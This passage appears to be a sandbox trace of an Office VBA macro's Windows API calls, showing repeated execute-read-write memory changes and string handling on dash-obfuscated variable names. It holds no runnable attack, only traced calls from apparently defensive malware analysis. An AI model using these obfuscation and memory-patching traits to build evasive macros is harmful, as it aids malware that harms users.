lpBaseAddress=0xcadb101, dwSize=0x2) returned 1 [0114.572] GetCurrentProcess () returned 0xffffffff [0114.572] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb120, dwSize=0x14) returned 1 [0114.572] VirtualProtect (in: lpAddress=0xcadb120, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1972ac | out: lpflOldProtect=0x1972ac*=0x40) returned 1 [0114.573] GetCurrentProcess () returned 0xffffffff [0114.573] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb121, dwSize=0x2) returned 1 [0114.574] GetAsyncKeyState (vKey=3) returned 0 [0114.574] GetAsyncKeyState (vKey=3) returned 0 [0114.574] CRetailMalloc_Alloc () returned 0xcaa38b8 [0114.574] memcpy (in: _Dst=0xb754f48, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0114.574] memcpy (in: _Dst=0xb755050, _Src=0x197404, _Size=0xc | out: _Dst=0xb755050) returned 0xb755050 [0114.574] memcpy (in: _Dst=0xb754f48, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0114.574] memcpy (in: _Dst=0xb754f48, _Src=0x1973bc, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0114.574] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x97\x97\x97\x96\x97\x96\x97\x96\x96\x96\x97\x96\x96\x96\x97\x96\x97\x96\x96\x96\x96\x96\x97\x96\x96\x96\x96\x97\x96\x96", cchCount1=-1, lpString2="\x96\x97\x96\x97\x96\x96\x96\x96\x97\x97\x97\x96\x96\x97\x96\x97\x97\x97\x97\x96\x97\x96\x96\x96\x97\x96\x97\x96\x96\x96\x96", cchCount2=-1) returned 3 [0114.575] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11302e5a, cbMultiByte=32, lpWideCharStr=0x197204, cchWideChar=33 | out: lpWideCharStr="–—–—––––———––—–————–—–––—–—––––") returned 32 [0114.575] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111e2d1a, cbMultiByte=32, lpWideCharStr=0x197264, cchWideChar=33 | out: lpWideCharStr="–—–—––––———––—–————–—–––—–—––––") returned 32 [0114.575] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111e2d1a, cbMultiByte=32, lpWideCharStr=0x197264, cchWideChar=33 | out: lpWideCharStr="–—–—––––———––—–————–—–––—–—––––") returned 32 [0114.575] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111e2d1a, cbMultiByte=32, lpWideCharStr=0x197264, cchWideChar=33 | out: lpWideCharStr="–—–—––––———––—–————–—–––—–—––––") returned 32 [0114.576] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x96\x97\x97\x97\x96\x97\x96\x97\x96\x96\x96\x97\x96\x96\x96\x97\x96\x97\x96\x96\x96\x96\x96\x97\x96\x96\x96\x96\x97\x96\x96", cchCount1=-1, lpString2="\x96\x97\x96\x97\x96\x96\x96\x96\x97\x97\x97\x96\x96\x97\x96\x97\x97\x97\x97\x96\x97\x96\x96\x96\x97\x96\x97\x96\x96\x96\x96", cchCount2=-1) returned 3 [0114.576] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111e2d1a, cbMultiByte=32, lpWideCharStr=0x197264, cchWideChar=33 | out: lpWideCharStr="–—–—––––———––—–————–—–––—–—––––") returned 32 [0114.576] CRetailMalloc_Alloc () returned 0xc844f70 [0114.576] _mbscpy_s (in: _Dst=0xc844f70, _DstSizeInBytes=0x20, _Src=0x111e2d1a | out: _Dst=0xc844f70) returned 0x0 [0114.576] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="_B_var_\x96\x97\x97\x97\x96\x97\x96\x97\x96\x96\x96\x97\x96\x96\x96\x97\x96\x97\x96\x96\x96\x96\x96\x97\x96\x96\x96\x96\x97\x96\x96", cchCount1=-1, lpString2="_B_var_\x96\x97\x96\x97\x96\x96\x96\x96\x97\x97\x97\x96\x96\x97\x96\x97\x97\x97\x97\x96\x97\x96\x96\x96\x97\x96\x97\x96\x96\x96\x96", cchCount2=-1) returned 3 [0114.576] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c0c52, cbMultiByte=39, lpWideCharStr=0x197274, cchWideChar=40 | out: lpWideCharStr="_B_var_–—–—––––———––—–————–—–––—–—––––") returned 39 [0114.577] _mbscpy_s (in: _Dst=0x1972dc, _DstSizeInBytes=0x20, _Src=0x111e2d1a | out: _Dst=0x1972dc) returned 0x0 [0114.577] CRetailMalloc_Free () returned 0x1 [0114.577] memcpy (in: _Dst=0xb755050, _Src=0xb755050, _Size=0xc | out: _Dst=0xb755050) returned 0xb755050 [0114.577] memcpy (in: _Dst=0xb754f48, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0114.577] memcpy (in: _Dst=0xb754f4c, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xb754f4c) returned 0xb754f4c [0114.577] memcpy (in: _Dst=0xb754f48, _Src=0x197254, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0114.577] memcpy (in: _Dst=0xb754f48, _Src=0x197254, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0114.577] memcpy (in: _Dst=0xb754f48, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0114.577] memcpy (in: _Dst=0xb754f48, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0114.577] memcpy (in: _Dst=0xcaa392c, _Src=0x197484, _Size=0x18 | out: _Dst=0xcaa392c) returned 0xcaa392c [0114.577] CRetailMalloc_Realloc () returned 0xcaa38b8 [0114.577] CRetailMalloc_Free () returned 0x1 [0114.578] GetCurrentProcess () returned 0xffffffff [0114.578] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912074, dwSize=0x14) returned 1 [0114.578] VirtualProtect (in: lpAddress=0xc912074, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.578] GetCurrentProcess () returned 0xffffffff [0114.578] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912075, dwSize=0x2) returned 1 [0114.578] GetCurrentProcess () returned 0xffffffff [0114.578] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912094, dwSize=0x14) returned 1 [0114.578] VirtualProtect (in: lpAddress=0xc912094, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.579] GetCurrentProcess () returned 0xffffffff [0114.579] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912095, dwSize=0x2) returned 1 [0114.579] GetCurrentProcess () returned 0xffffffff [0114.579] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120b4, dwSize=0x14) returned 1 [0114.579] VirtualProtect (in: lpAddress=0xc9120b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.580] GetCurrentProcess () returned 0xffffffff [0114.580] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120b5, dwSize=0x2) returned 1 [0114.580] GetCurrentProcess () returned 0xffffffff [0114.580] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120d4, dwSize=0x14) returned 1 [0114.580] VirtualProtect (in: lpAddress=0xc9120d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.582] GetCurrentProcess () returned 0xffffffff [0114.582] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120d5, dwSize=0x2) returned 1 [0114.582] GetCurrentProcess () returned 0xffffffff [0114.582] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120f4, dwSize=0x14) returned 1 [0114.582] VirtualProtect (in: lpAddress=0xc9120f4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.582] GetCurrentProcess () returned 0xffffffff [0114.582] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120f5, dwSize=0x2) returned 1 [0114.582] GetCurrentProcess () returned 0xffffffff [0114.582] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912114, dwSize=0x14) returned 1 [0114.582] VirtualProtect (in: lpAddress=0xc912114, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.583] GetCurrentProcess () returned 0xffffffff [0114.583] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912115, dwSize=0x2) returned 1 [0114.583] GetCurrentProcess () returned 0xffffffff [0114.583] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912134, dwSize=0x14) returned 1 [0114.583] VirtualProtect (in: lpAddress=0xc912134, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.584] GetCurrentProcess () returned 0xffffffff [0114.584] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912135, dwSize=0x2) returned 1 [0114.584] GetCurrentProcess () returned 0xffffffff [0114.584] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912154, dwSize=0x14) returned 1 [0114.584] VirtualProtect (in: lpAddress=0xc912154, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.584] GetCurrentProcess () returned 0xffffffff [0114.584] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912155, dwSize=0x2) returned 1 [0114.585] GetCurrentProcess () returned 0xffffffff [0114.585] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912174, dwSize=0x14) returned 1 [0114.585] VirtualProtect (in: lpAddress=0xc912174, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.585] GetCurrentProcess () returned 0xffffffff [0114.585] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912175, dwSize=0x2) returned 1 [0114.585] GetCurrentProcess () returned 0xffffffff [0114.585] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912194, dwSize=0x14) returned 1 [0114.585] VirtualProtect (in: lpAddress=0xc912194, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.586] GetCurrentProcess () returned 0xffffffff [0114.586] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912195, dwSize=0x2) returned 1 [0114.586] GetCurrentProcess () returned 0xffffffff [0114.586] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121b4, dwSize=0x14) returned 1 [0114.586] VirtualProtect (in: lpAddress=0xc9121b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.587] GetCurrentProcess () returned 0xffffffff [0114.587] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121b5, dwSize=0x2) returned 1 [0114.587] GetCurrentProcess () returned 0xffffffff [0114.587] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121d4, dwSize=0x14) returned 1 [0114.587] VirtualProtect (in: lpAddress=0xc9121d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.588] GetCurrentProcess () returned 0xffffffff [0114.588] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9121d5, dwSize=0x2) returned 1 [0114.588] GetCurrentProcess () returned 0xffffffff [0114.588] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc898, dwSize=0x14) returned 1 [0114.588] VirtualProtect (in: lpAddress=0xcadc898, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.589] GetCurrentProcess () returned 0xffffffff [0114.589] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc899, dwSize=0x2) returned 1 [0114.589] GetCurrentProcess () returned 0xffffffff [0114.589] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8b8, dwSize=0x14) returned 1 [0114.589] VirtualProtect (in: lpAddress=0xcadc8b8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.590] GetCurrentProcess () returned 0xffffffff [0114.590] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8b9, dwSize=0x2) returned 1 [0114.590] GetCurrentProcess () returned 0xffffffff [0114.590] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8d8, dwSize=0x14) returned 1 [0114.590] VirtualProtect (in: lpAddress=0xcadc8d8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.590] GetCurrentProcess () returned 0xffffffff [0114.590] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8d9, dwSize=0x2) returned 1 [0114.590] GetCurrentProcess () returned 0xffffffff [0114.590] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8f8, dwSize=0x14) returned 1 [0114.590] VirtualProtect (in: lpAddress=0xcadc8f8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.591] GetCurrentProcess () returned 0xffffffff [0114.591] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc8f9, dwSize=0x2) returned 1 [0114.591] GetCurrentProcess () returned 0xffffffff [0114.591] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc918, dwSize=0x14) returned 1 [0114.591] VirtualProtect (in: lpAddress=0xcadc918, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.592] GetCurrentProcess () returned 0xffffffff [0114.592] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc919, dwSize=0x2) returned 1 [0114.592] GetCurrentProcess () returned 0xffffffff [0114.592] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc938, dwSize=0x14) returned 1 [0114.592] VirtualProtect (in: lpAddress=0xcadc938, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.593] GetCurrentProcess () returned 0xffffffff [0114.593] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc939, dwSize=0x2) returned 1 [0114.593] GetCurrentProcess () returned 0xffffffff [0114.593] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc958, dwSize=0x14) returned 1 [0114.593] VirtualProtect (in: lpAddress=0xcadc958, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.594] GetCurrentProcess () returned 0xffffffff [0114.594] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc959, dwSize=0x2) returned 1 [0114.594] GetCurrentProcess () returned 0xffffffff [0114.594] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc978, dwSize=0x14) returned 1 [0114.594] VirtualProtect (in: lpAddress=0xcadc978, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.594] GetCurrentProcess () returned 0xffffffff [0114.594] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc979, dwSize=0x2) returned 1 [0114.594] GetCurrentProcess () returned 0xffffffff [0114.594] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc998, dwSize=0x14) returned 1 [0114.595] VirtualProtect (in: lpAddress=0xcadc998, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.595] GetCurrentProcess () returned 0xffffffff [0114.595] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc999, dwSize=0x2) returned 1 [0114.595] GetCurrentProcess () returned 0xffffffff [0114.595] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9b8, dwSize=0x14) returned 1 [0114.595] VirtualProtect (in: lpAddress=0xcadc9b8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.596] GetCurrentProcess () returned 0xffffffff [0114.596] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9b9, dwSize=0x2) returned 1 [0114.596] GetCurrentProcess () returned 0xffffffff [0114.596] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9d8, dwSize=0x14) returned 1 [0114.596] VirtualProtect (in: lpAddress=0xcadc9d8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.598] GetCurrentProcess () returned 0xffffffff [0114.598] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9d9, dwSize=0x2) returned 1 [0114.598] GetCurrentProcess () returned 0xffffffff [0114.598] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9f8, dwSize=0x14) returned 1 [0114.598] VirtualProtect (in: lpAddress=0xcadc9f8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.599] GetCurrentProcess () returned 0xffffffff [0114.599] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadc9f9, dwSize=0x2) returned 1 [0114.599] GetCurrentProcess () returned 0xffffffff [0114.599] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca18, dwSize=0x14) returned 1 [0114.599] VirtualProtect (in: lpAddress=0xcadca18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.600] GetCurrentProcess () returned 0xffffffff [0114.600] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca19, dwSize=0x2) returned 1 [0114.600] GetCurrentProcess () returned 0xffffffff [0114.600] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca38, dwSize=0x14) returned 1 [0114.600] VirtualProtect (in: lpAddress=0xcadca38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.600] GetCurrentProcess () returned 0xffffffff [0114.600] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca39, dwSize=0x2) returned 1 [0114.600] GetCurrentProcess () returned 0xffffffff [0114.600] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca58, dwSize=0x14) returned 1 [0114.600] VirtualProtect (in: lpAddress=0xcadca58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.601] GetCurrentProcess () returned 0xffffffff [0114.601] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca59, dwSize=0x2) returned 1 [0114.601] GetCurrentProcess () returned 0xffffffff [0114.601] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca78, dwSize=0x14) returned 1 [0114.601] VirtualProtect (in: lpAddress=0xcadca78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.602] GetCurrentProcess () returned 0xffffffff [0114.602] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadca79, dwSize=0x2) returned 1 [0114.602] GetCurrentProcess () returned 0xffffffff [0114.602] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb0e0, dwSize=0x14) returned 1 [0114.602] VirtualProtect (in: lpAddress=0xcadb0e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.602] GetCurrentProcess () returned 0xffffffff [0114.602] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb0e1, dwSize=0x2) returned 1 [0114.602] GetCurrentProcess () returned 0xffffffff [0114.602] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb100, dwSize=0x14) returned 1 [0114.603] VirtualProtect (in: lpAddress=0xcadb100, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.603] GetCurrentProcess () returned 0xffffffff [0114.603] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb101, dwSize=0x2) returned 1 [0114.603] GetCurrentProcess () returned 0xffffffff [0114.603] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb120, dwSize=0x14) returned 1 [0114.603] VirtualProtect (in: lpAddress=0xcadb120, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.604] GetCurrentProcess () returned 0xffffffff [0114.604] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcadb121, dwSize=0x2) returned 1 [0114.605] GetAsyncKeyState (vKey=3) returned 0 [0114.605] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.605] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.605] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.605] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.605] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.605] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.605] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.605] VarSub (in: pvarLeft=0x197bb4, pvarRight=0x197ba4, pvarResult=0x197b94 | out: pvarResult=0x197b94) returned 0x0 [0114.605] SafeArrayAllocDescriptorEx (in: vt=0x11, cDims=0x1, ppsaOut=0x197b90 | out: ppsaOut=0x197b90) returned 0x0 [0114.605] SafeArrayAllocData (psa=0xc844ef0) returned 0x0 [0114.678] VarBstrCat (in: bstrLeft="&", bstrRight="H", pbstrResult=0x197ac4 | out: pbstrResult=0x197ac4) returned 0x0 [0114.678] VarCmp (pvarLeft=0x197908, pvarRight=0x1978f8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.678] VarCmp (pvarLeft=0x197908, pvarRight=0x1978f8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.678] VarCmp (pvarLeft=0x197908, pvarRight=0x1978f8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.678] VarCmp (pvarLeft=0x197908, pvarRight=0x1978f8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.678] VarCmp (pvarLeft=0x197908, pvarRight=0x1978f8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.678] VarCmp (pvarLeft=0x197908, pvarRight=0x1978f8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0114.679] VarCmp (pvarLeft=0x197908, pvarRight=0x1978f8, lcid=0x0, dwFlags=0x30001) returned 0x1 [0114.679] VarSub (in: pvarLeft=0x197bb4, pvarRight=0x197ba4, pvarResult=0x197b94 | out: pvarResult=0x197b94) returned 0x0 [0114.679] CRetailMalloc_Alloc () returned 0xcaa3980 [0114.679] memcpy (in: _Dst=0xb754f48, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0114.679] memcpy (in: _Dst=0xb754f4c, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xb754f4c) returned 0xb754f4c [0114.679] memcpy (in: _Dst=0xb754f50, _Src=0x19741c, _Size=0x4 | out: _Dst=0xb754f50) returned 0xb754f50 [0114.679] memcpy (in: _Dst=0xb754f4c, _Src=0x1973c8, _Size=0x4 | out: _Dst=0xb754f4c) returned 0xb754f4c [0114.679] memcpy (in: _Dst=0xb754f50, _Src=0x19741c, _Size=0x4 | out: _Dst=0xb754f50) returned 0xb754f50 [0114.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11301146, cbMultiByte=4, lpWideCharStr=0x197204, cchWideChar=5 | out: lpWideCharStr="Mid") returned 4 [0114.679] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111e1146, cbMultiByte=4, lpWideCharStr=0x197264, cchWideChar=5 | out: lpWideCharStr="Mid") returned 4 [0114.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111e1146, cbMultiByte=4, lpWideCharStr=0x197264, cchWideChar=5 | out: lpWideCharStr="Mid") returned 4 [0114.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111e1146, cbMultiByte=4, lpWideCharStr=0x197264, cchWideChar=5 | out: lpWideCharStr="Mid") returned 4 [0114.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x111e1146, cbMultiByte=4, lpWideCharStr=0x197264, cchWideChar=5 | out: lpWideCharStr="Mid") returned 4 [0114.680] CRetailMalloc_Alloc () returned 0xcac5748 [0114.680] _mbscpy_s (in: _Dst=0xcac5748, _DstSizeInBytes=0x4, _Src=0x111e1146 | out: _Dst=0xcac5748) returned 0x0 [0114.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x112c0c96, cbMultiByte=11, lpWideCharStr=0x197274, cchWideChar=12 | out: lpWideCharStr="_B_var_Mid") returned 11 [0114.681] CRetailMalloc_Free () returned 0x1 [0114.681] memcpy (in: _Dst=0xb754f48, _Src=0x1973e8, _Size=0x4 | out: _Dst=0xb754f48) returned 0xb754f48 [0114.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x6980ded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0114.681] memcpy (in: _Dst=0xcaa39c8, _Src=0x197484, _Size=0x18 | out: _Dst=0xcaa39c8) returned 0xcaa39c8 [0114.681] CRetailMalloc_Realloc () returned 0xcaa3980 [0114.681] CRetailMalloc_Free () returned 0x1 [0114.681] GetCurrentProcess () returned 0xffffffff [0114.682] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912074, dwSize=0x14) returned 1 [0114.682] VirtualProtect (in: lpAddress=0xc912074, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.682] GetCurrentProcess () returned 0xffffffff [0114.682] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912075, dwSize=0x2) returned 1 [0114.682] GetCurrentProcess () returned 0xffffffff [0114.682] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912094, dwSize=0x14) returned 1 [0114.682] VirtualProtect (in: lpAddress=0xc912094, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.683] GetCurrentProcess () returned 0xffffffff [0114.683] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc912095, dwSize=0x2) returned 1 [0114.683] GetCurrentProcess () returned 0xffffffff [0114.683] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120b4, dwSize=0x14) returned 1 [0114.683] VirtualProtect (in: lpAddress=0xc9120b4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.684] GetCurrentProcess () returned 0xffffffff [0114.684] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120b5, dwSize=0x2) returned 1 [0114.684] GetCurrentProcess () returned 0xffffffff [0114.684] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120d4, dwSize=0x14) returned 1 [0114.684] VirtualProtect (in: lpAddress=0xc9120d4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 [0114.684] GetCurrentProcess () returned 0xffffffff [0114.685] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120d5, dwSize=0x2) returned 1 [0114.685] GetCurrentProcess () returned 0xffffffff [0114.685] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xc9120f4, dwSize=0x14) returned 1 [0114.685] VirtualProtect (in: lpAddress=0xc9120f4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x19712c | out: lpflOldProtect=0x19712c*=0x40) returned 1 